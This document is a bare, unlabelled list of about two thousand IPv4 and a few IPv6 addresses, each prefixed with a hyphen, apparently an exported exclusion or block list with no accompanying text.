-82.135.151.116 -114.215.31.108 -23.19.22.46 -139.162.190.124 -64.150.180.213 -119.29.38.42 -61.147.69.233 -67.229.58.205 -142.91.241.81 -200.106.160.72 -142.91.95.65 -23.224.115.87 -43.229.155.198 -114.130.4.69 -198.65.151.227 -123.57.172.81 -158.69.79.153 -217.19.208.22 -62.50.167.123 -119.29.39.196 -66.70.150.215 -46.105.244.185 -132.148.20.197 -104.224.201.243 -185.141.194.74 -71.184.68.19 -51.15.194.79 -107.6.221.122 -103.100.157.182 -52.210.20.105 -35.164.123.15 -185.206.49.254 -188.227.225.78 -103.68.83.3 -45.79.75.161 -124.193.198.218 -141.138.140.6 -142.91.95.210 -185.174.30.218 -5.135.192.118 -104.217.54.8 -151.248.113.183 -139.129.51.36 -182.254.151.31 -64.120.123.251 -34.235.121.171 -81.30.156.16 -107.180.68.240 -103.53.198.188 -161.202.23.107 -45.114.94.155 -94.23.166.136 -117.34.92.145 -23.244.241.14 -223.202.75.115 -45.77.40.180 -173.214.188.39 -94.247.28.252 -103.100.157.252 -157.7.133.120 -37.187.29.81 -66.254.163.8 -190.12.103.140 -104.217.62.17 -185.174.30.223 -114.215.67.71 -121.41.27.209 -47.100.57.104 -37.48.90.64 -150.95.174.191 -177.69.103.169 -118.126.5.223 -212.47.238.157 -142.4.107.112 -107.187.41.59 -101.200.196.123 -104.203.139.121 -23.104.187.20 -139.196.200.2 -125.167.236.159 -38.121.61.126 -120.76.200.144 -123.57.172.200 -198.24.128.16 -218.32.216.245 -23.19.202.13 -219.90.122.8 -103.12.49.9 -164.70.8.99 -88.212.220.167 -173.255.192.55 -121.199.20.195 -113.107.188.148 -192.99.68.33 -23.224.115.22 -104.217.67.75 -96.44.167.104 -182.254.242.252 -163.172.194.220 -178.21.13.206 -23.104.135.232 -103.100.157.212 -116.226.69.251 -104.203.82.61 -107.180.69.80 -23.238.129.91 -46.32.255.192 -103.100.157.11 -142.91.95.227 -69.164.211.106 -103.214.171.22 -192.165.105.224 -34.238.119.150 -118.190.22.31 -128.14.93.253 -45.63.109.3 -121.41.30.106 -142.91.95.107 -67.229.32.227 -191.101.150.5 -222.73.54.116 -45.32.119.102 -121.42.39.69 -178.79.191.120 -47.90.85.187 -195.88.34.61 -61.153.44.182 -178.20.155.100 -172.107.64.8 -23.104.176.25 -167.114.91.62 -172.107.146.143 -121.121.15.164 -23.92.22.23 -43.247.69.77 -172.255.159.230 -123.142.190.80 -172.106.186.36 -139.196.106.231 -94.23.168.128 -185.13.58.11 -66.70.223.64 -123.29.75.76 -204.12.219.210 -142.91.232.72 -120.24.1.184 -164.132.182.103 -50.23.78.144 -177.93.110.12 -47.104.108.186 -54.254.184.108 -113.196.87.131 -213.219.39.68 -104.224.203.155 -122.114.47.53 -23.88.82.143 -172.106.187.231 -91.229.113.69 -209.23.127.85 -106.247.240.250 -178.208.130.252 -165.84.179.166 -202.75.219.78 -37.187.22.116 -193.45.5.46 -54.36.252.252 -31.210.75.246 -104.232.75.159 -54.88.176.102 -45.35.125.49 -202.153.34.253 -23.19.22.38 -174.139.37.121 -104.203.139.130 -198.27.126.54 -117.18.15.41 -82.135.151.202 -94.23.216.91 -50.97.227.215 -79.133.208.20 -122.13.170.178 -111.231.115.244 -89.108.108.231 -149.56.140.57 -150.129.217.112 -23.110.56.90 -52.91.217.12 -216.117.162.171 -119.28.76.96 -210.35.128.154 -173.255.223.45 -31.31.74.10 -69.87.198.117 -176.31.190.99 -166.63.21.7 -120.76.167.189 -149.202.155.86 -119.81.107.188 -94.23.187.217 -104.149.66.154 -23.225.113.240 -210.5.43.52 -101.200.147.174 -45.33.81.152 -139.196.172.13 -133.242.23.152 -104.217.54.55 -121.42.230.159 -54.81.29.248 -47.88.153.118 -188.165.192.205 -104.232.75.132 -198.178.125.9 -185.136.204.225 -184.173.65.111 -123.57.135.12 -74.117.105.21 -47.100.183.53 -103.200.22.178 -172.246.101.54 -5.160.219.4 -221.4.38.249 -103.100.157.17 -82.102.14.8 -119.59.67.24 -81.196.46.253 -140.124.181.50 -64.235.44.192 -122.114.97.216 -195.197.195.69 -47.90.78.250 -222.184.26.146 -34.245.166.68 -103.8.78.253 -222.184.114.2 -27.155.97.94 -172.104.236.178 -109.70.140.182 -45.42.94.151 -64.120.123.172 -107.161.18.107 -69.164.210.155 -77.31.217.59 -153.120.50.205 -103.205.3.108 -23.88.82.101 -173.199.116.28 -139.162.119.137 -23.244.241.156 -193.224.41.25 -47.89.33.11 -185.174.29.221 -149.202.98.88 -193.106.218.5 -54.37.221.239 -164.132.218.27 -144.217.223.154 -115.126.37.136 -66.101.196.3 -183.2.185.228 -103.205.1.114 -159.122.208.132 -35.154.43.0 -78.46.106.113 -88.150.157.242 -185.171.24.71 -112.91.23.201 -69.195.199.105 -108.60.213.45 -173.236.115.67 -211.159.187.215 -172.246.101.172 -104.232.75.147 -89.42.24.139 -86.104.177.117 -120.24.180.181 -111.230.10.190 -109.201.146.40 -103.205.3.77 -222.177.5.42 -125.6.162.134 -123.57.220.93 -111.225.222.119 -77.92.144.12 -222.90.111.151 -208.101.60.210 -45.35.99.186 -34.213.93.55 -2a00:1a48:7807:101:be76:4eff:fe09:8a6 -115.29.206.84 -213.187.80.5 -134.119.21.96 -5.160.219.6 -68.64.163.78 -203.174.76.207 -107.164.66.140 -185.8.173.227 -207.244.78.20 -37.187.109.189 -116.206.92.216 -23.230.19.101 -59.110.166.122 -188.165.187.58 -112.74.211.109 -103.12.51.34 -54.254.141.237 -123.56.252.76 -221.130.183.54 -114.255.8.88 -104.203.139.163 -23.230.19.161 -61.156.157.131 -192.34.26.38 -118.185.194.218 -175.0.195.119 -116.213.204.24 -190.82.103.228 -95.211.175.82 -202.148.12.243 -185.146.87.29 -54.87.128.249 -121.196.226.176 -123.57.146.157 -112.74.15.175 -74.208.47.126 -46.105.92.33 -52.76.117.25 -62.213.100.82 -158.69.36.14 -115.28.224.192 -13.250.146.59 -23.230.19.129 -103.24.13.237 -65.60.24.51 -62.210.129.98 -201.244.120.107 -45.114.94.118 -188.120.235.222 -91.92.230.230 -45.76.35.224 -103.209.234.147 -94.23.174.119 -37.187.37.136 -75.126.107.120 -198.15.119.100 -120.25.208.216 -107.180.71.168 -104.217.58.62 -37.187.128.203 -23.104.177.4 -193.228.153.15 -121.42.26.123 -13.113.74.57 -192.34.26.39 -180.173.90.208 -218.3.61.182 -180.111.61.228 -121.199.49.25 -136.0.69.82 -101.99.64.60 -112.74.31.162 -103.209.234.218 -103.23.41.99 -167.114.59.53 -172.104.51.135 -103.248.253.13 -65.18.113.61 -136.0.69.72 -121.199.29.218 -107.181.251.149 -162.221.187.5 -46.20.120.128 -74.208.161.31 -137.74.9.135 -212.68.42.106 -37.48.87.227 -103.205.0.101 -207.20.231.31 -222.186.59.235 -123.57.238.51 -185.174.31.225 -42.96.139.120 -172.107.147.43 -112.121.163.36 -222.187.227.90 -104.232.75.149 -107.20.74.225 -109.201.152.123 -107.165.201.204 -221.8.221.61 -172.106.184.33 -103.227.116.76 -104.232.75.165 -219.142.105.12 -104.149.66.190 -123.206.73.58 -204.44.66.109 -23.238.129.96 -164.177.146.224 -64.131.77.143 -67.222.133.246 -104.156.225.122 -54.202.134.81 -49.212.137.177 -23.19.22.25 -193.17.208.252 -13.210.44.64 -59.151.7.173 -47.89.244.204 -182.48.116.5 -119.29.18.103 -172.246.101.180 -194.58.111.200 -82.135.151.198 -23.238.129.72 -149.56.238.38 -74.207.225.154 -118.69.196.27 -123.122.222.89 -120.25.214.200 -164.115.9.169 -136.0.69.136 -95.173.170.46 -5.39.121.101 -158.255.80.4 -217.20.131.153 -211.155.25.161 -101.201.116.102 -142.91.95.79 -216.55.141.206 -119.28.102.129 -193.70.107.15 -164.70.8.166 -199.168.189.6 -173.0.63.196 -174.129.90.136 -52.68.243.70 -146.148.63.102 -45.64.169.115 -108.168.169.90 -149.56.36.50 -23.88.82.31 -52.0.139.180 -173.214.190.87 -23.225.0.19 -23.88.82.196 -194.28.173.84 -45.33.5.46 -45.252.250.185 -109.206.169.205 -115.29.245.2 -121.196.226.207 -207.58.186.59 -119.23.246.12 -218.32.216.169 -123.57.9.103 -195.242.117.76 -149.56.23.112 -177.221.116.12 -202.154.189.181 -95.183.48.75 -137.74.90.65 -59.49.39.3 -5.135.51.67 -119.28.99.243 -142.91.239.85 -195.182.132.52 -103.86.177.94 -218.32.216.145 -211.103.220.133 -54.164.107.87 -123.206.31.210 -209.222.4.166 -54.172.209.6 -121.28.11.190 -97.74.238.124 -211.196.153.101 -23.225.89.103 -23.225.89.14 -104.149.201.53 -104.149.66.150 -104.217.54.45 -52.29.175.18 -47.90.17.148 -98.126.202.140 -121.43.110.203 -210.245.80.39 -50.116.6.58 -130.179.22.112 -198.24.160.91 -95.211.10.248 -162.208.11.134 -172.106.184.10 -223.255.250.182 -103.198.45.39 -212.227.9.108 -23.19.238.58 -211.149.195.18 -218.5.74.105 -198.58.125.143 -120.26.78.37 -142.91.95.105 -103.45.105.28 -23.238.145.72 -216.119.150.39 -45.114.94.138 -23.225.0.77 -112.74.102.127 -192.99.180.157 -91.150.169.202 -139.199.175.27 -198.178.126.170 -188.10.213.33 -62.12.114.178 -54.91.65.213 -66.179.102.226 -47.95.116.23 -125.253.127.185 -39.108.193.249 -172.106.184.32 -177.69.103.165 -5.196.117.203 -112.126.93.34 -185.4.227.122 -103.74.117.208 -192.163.239.24 -23.104.135.138 -112.74.132.189 -83.149.89.44 -47.104.29.64 -69.64.69.126 -5.2.86.92 -115.29.14.196 -124.243.254.136 -185.174.28.84 -74.222.24.65 -144.217.72.75 -61.53.170.25 -203.160.59.46 -103.14.35.46 -182.150.37.95 -94.140.210.190 -177.21.30.94 -121.196.227.42 -119.139.197.216 -50.116.76.103 -192.254.146.211 -113.196.233.184 -85.214.196.104 -103.235.234.221 -139.129.44.183 -31.220.45.50 -23.225.0.194 -94.23.167.204 -182.254.208.11 -109.235.252.156 -47.91.151.117 -196.1.59.39 -123.56.43.43 -179.178.55.81 -151.80.172.13 -103.209.234.99 -101.201.40.57 -221.131.74.161 -180.131.42.214 -96.44.157.19 -162.247.78.81 -192.99.71.39 -180.76.138.24 -69.64.80.173 -112.124.63.65 -182.16.20.42 -31.3.0.98 -122.114.43.236 -158.69.161.50 -120.24.78.110 -45.32.129.78 -103.41.126.8 -45.35.99.169 -23.244.241.89 -114.215.193.68 -39.107.58.96 -103.11.96.10 -23.88.82.118 -45.42.94.134 -103.242.1.189 -202.147.5.160 -111.89.176.172 -23.225.113.144 -23.239.0.5 -91.194.251.91 -114.226.120.150 -107.150.41.26 -185.76.1.11 -200.24.90.27 -121.40.189.166 -45.41.92.190 -107.180.84.46 -58.56.154.18 -190.12.44.5 -99.64.103.46 -194.28.172.47 -5.196.28.195 -172.104.63.157 -112.175.152.136 -192.163.253.222 -111.39.137.108 -45.32.107.22 -120.78.67.161 -120.24.42.114 -120.77.179.150 -118.190.80.238 -142.4.201.149 -94.23.99.122 -172.107.64.51 -46.105.53.46 -112.103.200.195 -103.28.38.198 -177.93.110.7 -202.77.104.170 -41.77.101.13 -121.9.242.234 -64.46.58.78 -23.104.135.30 -118.112.183.17 -23.225.89.65 -123.57.207.20 -95.129.0.70 -83.217.185.26 -216.52.187.215 -34.242.169.195 -103.12.49.8 -211.149.234.175 -46.248.186.27 -37.247.104.25 -205.209.155.208 -107.22.241.64 -112.74.13.142 -54.37.190.43 -104.250.135.22 -155.94.156.81 -54.245.110.247 -114.113.145.82 -68.168.114.195 -222.172.107.198 -45.41.92.133 -37.187.166.95 -119.29.56.200 -120.76.41.64 -213.251.139.232 -23.224.115.122 -92.175.208.153 -54.218.65.4 -202.164.63.10 -52.197.224.229 -209.126.122.137 -87.109.240.216 -183.232.9.202 -120.79.175.254 -184.107.219.78 -123.30.191.177 -114.215.180.156 -198.12.152.184 -183.245.140.230 -120.25.77.240 -23.104.187.11 -45.56.110.47 -103.205.2.98 -183.129.130.172 -188.93.95.8 -149.56.231.103 -222.74.69.233 -60.12.232.17 -91.134.228.233 -107.187.41.225 -104.196.193.224 -193.104.170.230 -47.88.34.156 -118.89.234.161 -207.38.82.248 -23.225.113.3 -172.107.73.244 -176.57.220.99 -54.187.80.193 -23.225.0.110 -5.39.61.220 -103.209.234.53 -183.60.177.97 -23.92.77.57 -220.173.141.45 -38.128.113.59 -86.120.110.42 -54.201.181.54 -121.201.9.155 -107.164.66.94 -216.223.26.250 -198.24.163.253 -104.149.66.138 -43.229.77.51 -112.213.95.125 -104.217.54.47 -52.193.117.74 -118.190.69.147 -58.214.254.61 -185.174.28.142 -122.114.47.250 -121.199.11.200 -111.8.176.36 -61.160.223.154 -58.20.52.179 -188.210.223.152 -139.199.208.191 -121.40.40.26 -5.153.23.133 -47.90.53.156 -43.230.201.36 -43.230.202.222 -172.246.101.9 -192.254.146.212 -23.225.113.53 -104.203.82.11 -121.199.73.19 -138.201.72.54 -172.104.186.97 -107.180.84.124 -176.31.106.209 -45.119.80.174 -91.134.236.141 -104.243.139.166 -120.25.99.172 -139.162.7.221 -198.200.41.103 -184.154.76.235 -163.177.25.49 -120.76.239.81 -142.44.201.208 -209.133.198.170 -222.216.209.60 -5.153.250.42 -221.207.8.71 -112.246.166.150 -124.173.117.245 -142.4.119.92 -45.76.187.239 -45.61.113.4 -23.88.82.14 -112.217.202.76 -5.160.219.53 -178.33.181.43 -60.191.67.226 -124.42.11.166 -82.135.151.200 -142.91.95.216 -120.25.0.177 -101.200.104.100 -176.31.16.33 -23.225.89.136 -164.40.152.171 -103.48.80.100 -107.155.101.3 -116.236.231.208 -45.76.190.56 -122.114.189.9 -23.244.241.162 -62.210.5.86 -176.112.129.149 -192.95.18.158 -185.85.239.214 -2a00:1158:3::156 -46.105.74.230 -182.16.7.21 -47.88.221.246 -52.91.70.80 -46.105.31.10 -188.116.12.217 -103.28.38.246 -142.91.95.189 -172.246.101.199 -182.16.7.19 -103.243.94.231 -139.162.231.96 -89.108.71.29 -205.186.139.112 -119.6.241.144 -120.24.241.57 -23.238.166.158 -112.74.93.194 -139.224.26.159 -111.231.73.41 -37.187.88.121 -111.68.14.243 -106.185.40.184 -101.200.209.195 -101.132.75.53 -217.13.48.250 -161.202.163.135 -91.215.216.61 -182.92.196.218 -123.207.247.222 -91.240.141.222 -142.91.241.76 -120.26.221.33 -45.114.94.68 -54.177.169.131 -118.190.63.14 -115.236.59.30 -103.205.1.78 -77.92.144.26 -172.246.101.26 -113.196.233.158 -185.123.98.168 -82.135.148.53 -101.200.182.175 -123.207.78.53 -112.84.84.228 -37.59.53.117 -37.59.53.117 -23.88.82.184 -121.41.80.9 -104.217.54.23 -54.80.102.128 -23.238.129.117 -178.33.34.128 -62.210.105.39 -192.99.36.28 -118.178.16.16 -65.18.120.21 -46.105.145.17 -103.10.85.193 -103.25.20.180 -89.163.139.211 -151.80.172.2 -54.82.154.44 -104.232.102.138 -103.209.234.55 -65.60.24.50 -64.120.123.242 -158.69.211.254 -123.58.145.26 -101.201.50.48 -101.201.221.197 -218.87.41.93 -47.94.172.163 -209.236.119.84 -185.210.218.116 -78.135.79.198 -92.222.25.108 -118.89.199.110 -23.225.113.136 -202.6.17.154 -120.76.157.48 -172.106.184.43 -120.26.50.189 -113.107.188.146 -192.99.59.183 -216.144.230.187 -95.215.0.105 -120.77.64.48 -121.40.168.227 -166.62.36.225 -172.107.75.242 -23.225.113.34 -185.85.191.133 -183.3.223.16 -192.157.254.101 -111.47.13.103 -118.192.205.8 -218.92.90.86 -54.250.239.190 -199.247.26.97 -104.203.82.110 -172.107.147.60 -116.62.232.198 -51.255.133.82 -47.89.183.19 -167.114.63.113 -125.40.177.28 -221.232.136.101 -45.79.222.95 -67.229.73.78 -211.152.53.226 -120.26.49.24 -110.229.21.225 -118.193.240.196 -23.225.0.249 -101.200.179.201 -193.70.15.78 -218.61.195.230 -172.104.188.208 -217.20.131.120 -103.12.49.36 -114.215.142.24 -160.16.93.244 -50.112.142.202 -209.236.126.64 -14.147.76.190 -59.61.146.214 -178.32.142.140 -59.188.8.151 -128.1.165.222 -164.177.157.173 -108.61.12.158 -23.238.145.69 -95.213.196.69 -1.195.11.133 -54.83.51.70 -23.224.115.21 -121.199.42.40 -111.39.9.62 -23.238.129.88 -109.73.168.214 -188.93.95.169 -58.63.60.118 -122.114.42.196 -45.35.99.167 -172.107.146.135 -172.107.146.135 -121.35.96.212 -47.94.156.134 -158.69.76.60 -139.162.49.118 -123.57.255.1 -91.121.254.204 -107.187.41.165 -121.199.18.20 -93.187.234.8 -103.63.109.214 -183.36.126.115 -172.246.101.157 -115.146.127.80 -45.76.145.198 -204.93.61.68 -64.118.90.228 -23.238.129.112 -188.93.18.212 -42.112.19.180 -121.52.210.232 -23.88.82.21 -112.124.10.0 -91.134.231.84 -149.202.18.13 -59.110.52.209 -211.149.204.232 -211.101.37.229 -107.164.66.129 -45.41.92.184 -103.243.94.233 -54.163.163.125 -94.23.59.114 -95.163.78.241 -172.107.73.214 -112.78.10.77 -23.238.166.150 -107.164.66.193 -149.154.70.153 -61.135.136.211 -112.74.211.220 -107.174.70.250 -45.32.64.105 -123.56.157.28 -218.88.215.31 -198.50.141.8 -198.50.253.88 -112.53.234.24 -65.60.61.223 -192.155.224.184 -118.89.156.147 -61.160.207.244 -45.33.84.146 -104.149.66.146 -198.24.161.142 -103.4.159.8 -142.54.224.51 -172.110.28.50 -69.30.202.66 -178.20.224.100 -122.226.172.66 -174.142.242.77 -125.253.127.157 -45.76.179.189 -115.29.174.46 -142.91.243.83 -49.212.175.24 -220.73.163.82 -172.107.71.19 -103.100.157.209 -86.104.177.124 -103.231.66.34 -172.106.187.249 -23.239.13.129 -160.153.36.197 -50.193.229.171 -195.143.189.211 -61.153.110.8 -210.129.170.24 -192.165.240.209 -185.4.227.121 -128.1.203.14 -107.180.78.146 -112.25.55.98 -123.52.79.113 -139.196.107.211 -149.56.160.111 -202.51.117.210 -101.0.103.250 -52.231.29.21 -103.12.49.54 -103.250.84.188 -120.25.80.199 -61.160.222.6 -120.25.248.190 -112.74.191.116 -58.216.226.164 -82.135.151.207 -103.3.70.119 -94.23.206.177 -108.163.161.142 -200.69.5.5 -119.59.108.253 -120.77.180.141 -45.77.182.120 -86.104.177.78 -62.109.14.203 -104.237.132.108 -218.60.56.53 -203.195.130.175 -129.236.10.148 -117.121.10.225 -120.24.225.89 -23.229.227.190 -54.70.92.228 -107.187.41.25 -172.106.186.33 -172.107.75.227 -37.59.0.33 -202.137.16.89 -142.91.243.67 -103.209.234.102 -142.91.95.201 -101.200.183.200 -158.69.36.25 -121.41.87.237 -108.179.239.69 -184.107.158.94 -60.205.171.20 -142.44.226.193 -118.89.52.128 -114.215.174.204 -94.101.80.79 -193.19.118.108 -5.199.166.197 -203.205.37.250 -219.141.189.19 -54.173.207.73 -82.135.148.220 -93.89.112.226 -116.31.100.55 -23.237.64.124 -190.40.70.248 -45.114.94.80 -166.62.116.83 -37.59.30.176 -120.24.227.106 -111.92.64.109 -114.55.174.187 -96.126.98.22 -79.137.66.128 -67.229.58.226 -117.52.91.28 -5.189.135.131 -70.164.18.35 -220.226.210.63 -209.95.44.225 -120.193.224.188 -61.50.187.119 -104.238.78.82 -50.28.19.232 -58.60.152.181 -198.101.153.147 -118.185.102.58 -45.61.113.55 -51.254.76.93 -54.174.78.227 -107.164.66.181 -114.218.250.89 -213.158.170.13 -134.119.135.108 -103.90.220.88 -61.252.138.114 -181.111.252.219 -140.143.191.129 -120.76.154.230 -111.230.5.60 -54.178.215.34 -34.251.164.163 -92.222.209.26 -123.56.204.152 -47.95.246.249 -106.15.44.67 -218.61.5.27 -23.23.123.39 -104.224.203.152 -47.94.89.12 -104.232.75.142 -82.102.14.29 -188.120.245.129 -148.251.13.48 -93.188.166.197 -124.36.115.82 -185.79.56.70 -103.205.2.115 -54.36.36.4 -213.184.31.76 -166.63.21.96 -213.152.180.214 -103.198.45.38 -23.225.89.140 -80.69.78.42 -65.60.46.146 -144.168.70.136 -195.154.52.234 -108.61.151.34 -103.12.49.23 -46.248.165.212 -185.162.11.151 -139.224.70.33 -185.43.223.138 -23.104.135.84 -69.12.78.143 -42.159.245.64 -34.204.19.161 -66.129.66.248 -178.33.203.110 -151.80.172.57 -185.80.50.11 -107.151.113.213 -67.58.50.74 -123.71.220.134 -46.105.63.144 -5.100.250.108 -45.77.45.224 -45.61.113.42 -79.110.255.38 -115.159.66.136 -23.238.166.179 -115.236.162.250 -172.107.73.201 -107.190.232.70 -117.232.72.202 -149.255.108.119 -195.248.225.130 -94.23.74.63 -202.90.240.198 -120.26.93.140 -218.29.38.120 -23.110.56.100 -188.116.12.66 -115.28.153.38 -186.3.192.145 -173.230.251.179 -142.54.182.58 -64.120.123.157 -122.114.38.70 -114.55.118.63 -43.226.45.175 -121.42.164.144 -13.113.35.233 -107.187.41.139 -206.54.183.107 -109.73.168.205 -46.105.18.157 -121.40.221.12 -178.238.227.219 -219.136.249.51 -5.135.224.41 -188.165.213.53 -192.150.83.77 -120.76.125.14 -119.28.56.240 -198.200.41.13 -117.187.42.194 -219.159.199.199 -23.88.82.136 -167.114.91.63 -112.74.107.78 -139.162.34.245 -122.13.148.78 -198.57.172.250 -172.246.101.229 -198.50.176.76 -31.7.186.164 -45.117.162.158 -112.213.122.91 -107.151.78.202 -114.6.128.62 -103.209.234.33 -23.235.234.103 -112.90.224.51 -103.199.18.92 -190.129.48.60 -50.30.37.188 -94.138.212.37 -60.12.111.83 -216.92.246.47 -143.95.98.205 -211.149.232.232 -45.33.111.91 -120.27.100.48 -111.205.208.144 -139.196.31.82 -141.0.19.235 -54.79.67.61 -116.255.160.111 -104.217.54.37 -142.91.243.80 -82.135.151.130 -124.243.254.142 -69.20.126.56 -77.245.65.195 -65.49.14.16 -46.105.181.222 -103.235.254.235 -195.154.242.248 -172.106.184.37 -113.23.206.39 -103.198.45.54 -125.118.134.29 -23.244.241.241 -120.25.126.140 -45.35.99.140 -23.225.89.152 -54.37.182.242 -75.101.165.181 -185.187.161.160 -222.217.221.213 -120.76.41.79 -47.52.104.238 -217.18.144.105 -118.31.166.118 -5.135.88.210 -63.143.57.82 -58.64.188.6 -52.169.93.218 -209.151.166.233 -211.149.167.30 -121.199.36.179 -103.35.121.92 -193.234.224.223 -122.114.29.38 -91.222.251.105 -199.247.18.68 -201.203.206.129 -139.196.203.211 -78.128.214.36 -132.148.134.178 -52.38.166.14 -221.123.183.190 -142.91.95.75 -173.236.107.61 -112.91.24.154 -119.29.141.31 -52.208.253.177 -112.91.24.190 -140.120.190.203 -218.17.218.197 -106.186.17.163 -86.104.177.90 -23.236.100.5 -192.95.35.82 -103.205.1.106 -139.196.108.17 -23.238.145.119 -222.180.198.130 -45.32.121.58 -36.33.156.45 -47.52.152.75 -103.55.12.234 -104.149.66.165 -119.6.202.194 -23.110.47.222 -87.204.29.8 -110.87.106.175 -23.19.238.26 -94.23.52.67 -5.189.156.220 -172.106.186.34 -88.99.240.159 -23.238.166.177 -50.250.104.73 -114.55.91.92 -185.70.107.47 -151.80.172.42 -120.76.194.1 -115.236.100.116 -31.171.248.145 -134.119.139.62 -37.97.133.93 -23.225.0.52 -103.23.22.34 -67.128.79.8 -101.37.169.175 -121.199.58.34 -146.20.144.64 -31.24.201.10 -112.74.101.182 -65.60.43.179 -176.31.31.239 -192.232.199.9 -35.169.251.36 -201.73.144.146 -210.202.8.102 -101.201.64.239 -103.239.204.39 -82.194.87.153 -121.40.92.73 -37.187.201.58 -59.110.158.101 -108.59.251.38 -145.239.210.27 -103.74.117.228 -45.125.236.198 -35.154.138.175 -117.102.83.222 -103.12.51.50 -148.66.19.230 -190.187.94.150 -88.81.239.5 -188.132.180.77 -208.93.238.208 -199.119.140.52 -23.244.241.106 -123.206.63.249 -123.57.141.226 -54.83.193.212 -103.12.49.17 -103.74.118.201 -212.68.50.121 -112.74.54.180 -67.159.39.36 -213.32.50.83 -37.187.48.204 -123.57.133.51 -222.151.246.28 -51.255.127.219 -168.235.81.204 -37.187.196.7 -104.224.198.173 -118.190.152.63 -13.250.120.253 -104.232.75.171 -167.114.172.20 -112.78.10.88 -74.206.239.52 -175.153.115.47 -23.225.113.18 -203.62.152.42 -123.252.220.114 -222.112.230.30 -103.212.204.8 -37.59.123.3 -205.251.138.120 -120.77.65.63 -54.211.200.244 -23.244.241.197 -104.217.67.74 -188.42.195.244 -103.200.5.195 -123.56.44.60 -155.133.130.12 -106.187.91.50 -23.21.224.70 -207.210.68.45 -59.188.87.157 -112.81.16.102 -49.212.174.120 -200.46.193.203 -103.242.66.16 -123.157.217.149 -218.154.12.237 -52.27.195.110 -65.60.22.21 -158.69.88.14 -217.146.76.137 -199.223.234.117 -104.149.66.157 -182.16.162.155 -185.58.73.68 -120.77.168.131 -66.254.189.91 -104.250.135.7 -86.124.63.51 -82.135.151.93 -49.4.149.243 -54.249.236.2 -203.123.51.212 -5.196.65.234 -177.11.60.62 -200.73.116.86 -119.82.243.98 -104.232.102.150 -185.22.234.163 -182.16.48.188 -195.2.252.103 -121.78.196.154 -160.16.178.70 -195.248.234.144 -104.149.66.172 -23.19.237.10 -104.217.67.70 -95.213.202.29 -112.91.157.123 -95.142.164.232 -93.123.108.175 -149.202.196.93 -50.116.5.219 -119.23.72.177 -199.167.43.173 -54.91.79.88 -62.210.85.84 -114.248.206.94 -122.114.36.88 -153.120.75.121 -188.165.134.222 -185.27.134.253 -45.77.132.209 -54.245.239.17 -23.225.0.217 -23.238.145.108 -67.229.58.213 -120.55.81.53 -220.231.191.68 -109.201.149.176 -185.90.50.75 -45.76.189.236 -45.79.217.153 -130.215.29.111 -103.41.124.220 -52.25.239.21 -122.114.42.182 -49.65.99.145 -110.249.209.50 -120.25.243.46 -45.77.246.119 -111.16.49.19 -66.254.190.204 -168.235.92.164 -23.225.239.106 -149.210.143.132 -120.76.149.245 -54.36.126.85 -50.22.56.29 -194.247.13.216 -104.232.102.167 -112.5.124.61 -117.23.204.249 -23.19.237.16 -113.196.75.42 -172.110.29.188 -209.23.127.84 -112.124.105.194 -195.56.241.57 -103.28.38.88 -103.12.49.24 -125.39.24.37 -104.238.72.168 -120.76.129.171 -5.39.109.131 -185.13.58.9 -58.59.134.221 -172.107.146.171 -160.16.76.77 -61.129.70.168 -103.216.114.65 -139.199.26.238 -158.69.223.15 -45.33.7.101 -45.61.115.18 -124.42.66.87 -120.25.203.227 -38.134.11.143 -120.25.104.133 -139.162.118.78 -220.249.48.50 -204.93.61.66 -23.227.132.13 -120.27.236.36 -123.235.239.15 -187.63.160.15 -112.74.36.243 -148.163.161.220 -23.19.22.44 -142.4.107.82 -107.180.84.131 -121.15.10.50 -54.191.84.141 -107.165.201.176 -202.6.17.170 -118.89.198.254 -202.191.127.46 -23.225.89.52 -78.108.94.181 -37.49.229.36 -174.34.162.164 -175.106.10.195 -125.212.233.187 -58.211.166.61 -103.212.34.130 -23.225.239.200 -123.59.153.6 -142.91.95.164 -176.34.48.59 -121.199.38.144 -86.127.82.119 -193.151.90.240 -103.205.98.218 -221.212.70.138 -178.32.190.89 -136.0.69.124 -35.168.119.185 -206.214.210.213 -189.216.248.38 -118.31.187.190 -180.96.21.221 -119.29.134.119 -96.44.157.18 -183.247.163.12 -68.64.167.138 -23.225.89.16 -38.134.11.141 -195.154.59.16 -188.165.30.7 -45.125.216.230 -50.116.21.108 -106.187.91.239 -213.212.63.60 -46.218.85.88 -218.32.216.153 -142.4.107.240 -202.92.204.202 -47.88.224.216 -103.12.49.13 -203.162.16.252 -104.156.60.101 -62.33.191.145 -117.34.111.123 -86.104.177.50 -185.83.147.152 -138.201.68.196 -64.120.123.225 -217.8.245.186 -142.91.241.119 -101.0.68.123 -58.67.193.175 -95.47.36.129 -185.174.29.185 -121.40.171.157 -103.12.50.51 -23.225.113.190 -23.238.129.113 -193.70.16.220 -222.240.128.252 -50.31.3.25 -188.132.147.174 -5.2.174.251 -47.100.126.211 -190.2.72.14 -114.215.138.248 -69.64.38.61 -172.107.146.136 -65.181.121.183 -203.162.235.76 -85.234.148.180 -185.13.56.86 -122.225.106.28 -123.56.79.101 -115.28.210.244 -45.32.115.169 -23.244.241.223 -45.32.108.26 -136.0.69.194 -62.129.139.96 -14.104.82.150 -5.135.58.77 -94.23.227.167 -45.76.182.200 -71.146.64.223 -217.145.92.11 -82.195.148.232 -213.14.115.142 -161.202.7.154 -159.8.13.54 -173.212.223.198 -103.213.115.191 -115.159.63.101 -104.219.169.100 -103.74.121.204 -142.91.241.126 -91.121.254.200 -94.23.187.216 -64.137.234.113 -120.79.41.130 -223.4.28.103 -139.99.5.189 -118.89.27.64 -186.209.96.35 -5.101.140.34 -142.91.95.177 -119.29.58.177 -120.79.145.137 -31.28.166.242 -47.90.76.168 -142.91.239.115 -142.91.239.97 -115.238.169.184 -119.81.219.203 -167.114.32.144 -34.211.139.195 -52.10.178.45 -120.25.98.162 -23.110.56.102 -195.154.61.0 -185.52.0.5 -103.12.50.27 -139.129.215.109 -106.14.39.24 -115.28.9.211 -64.120.123.134 -112.124.44.212 -104.232.75.140 -23.110.47.247 -91.240.29.2 -13.229.129.219 -47.92.118.67 -39.108.104.54 -112.78.10.107 -41.185.21.148 -67.23.166.26 -61.38.186.61 -37.59.46.71 -23.225.0.254 -115.159.45.184 -97.107.136.69 -172.107.147.41 -23.225.113.227 -164.132.4.247 -116.31.115.209 -142.4.119.73 -151.80.172.34 -79.175.173.78 -34.212.101.252 -172.104.185.217 -185.174.31.202 -193.34.148.26 -101.200.203.57 -89.17.36.240 -219.90.122.9 -23.104.135.182 -123.207.156.238 -23.225.113.42 -121.40.240.214 -199.182.173.16 -101.200.175.149 -185.13.57.23 -120.76.79.64 